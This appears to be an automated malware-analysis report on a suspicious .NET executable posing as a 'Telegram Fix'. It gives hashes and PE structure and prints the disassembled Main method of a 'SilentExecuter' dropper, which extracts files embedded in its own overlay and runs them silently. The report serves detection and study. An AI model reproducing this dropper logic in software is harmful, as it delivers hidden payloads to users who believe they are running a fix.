Suspicious
Suspect

ce18440a9565e48ff6266831975c7f3f

PE Executable | MD5: ce18440a9565e48ff6266831975c7f3f | Size: 4.16 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Very low

Hash
MD5: ce18440a9565e48ff6266831975c7f3f
Sha1: 1c89214667ee27334c501e74fac2ceba00ac8216
Sha256: d1cf2bed3134dcfa6cc837d263f99ab2743d7b770f801be92b172f441b6e0ae5
Sha384: 168c20e255ac556e58fc999ecfd07b317951d023c8ff6ce381fe1665dba8925830d6a9d94046dd24bcf62d387122d440
Sha512: 389be4d75cc4377a3bb918b5dbf77aa694770acd5118bd616b0eabf2c447eb4d2e15c9a22675b0f785c40a088e58d4bead52fbf431775c5692f7defc36429b91
SSDeep: 98304:RYMrRtXovrojMKLxTerDmPtvcGoN+V8BXHpHjcFrJC6guyr4qG:RY8TPLxTeX+tvcBLXHporJDF
TLSH: 89162318B39A30AAD33646F5899D1502CD2EB8537F21D68B13528A863D6F3AD0F37731

PeID

.NET executable
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
Overlay_6fe74055.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information
Info: PE Detect: PeReader OK (file layout)
Info: Overlay extracted: Overlay_6fe74055.bin (4152418 bytes)
Module Name: Telegram Fix by Sexsoldier.exe
Full Name: Telegram Fix by Sexsoldier.exe
EntryPoint: System.Void SilentExecuter.Program::Main()
Scope Name: Telegram Fix by Sexsoldier.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Telegram Fix by Sexsoldier
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 1
Main Method: System.Void SilentExecuter.Program::Main()
Main IL Instruction Count: 240

Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{3A104D30-6B0A-41DB-A788-2C9A555ACCD9}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 
<null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_022F: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_022F ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_022F: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_022F ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_022F: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01E2: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s 
V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.1 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_01F7: ldloc.1 ldloc.3 <null> brfalse.s IL_01F6: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0211: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0201: ldloca.s V_26 
leave.s IL_022A: leave.s IL_022F ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_022F: ret pop <null> leave.s IL_022F: ret ret <null>
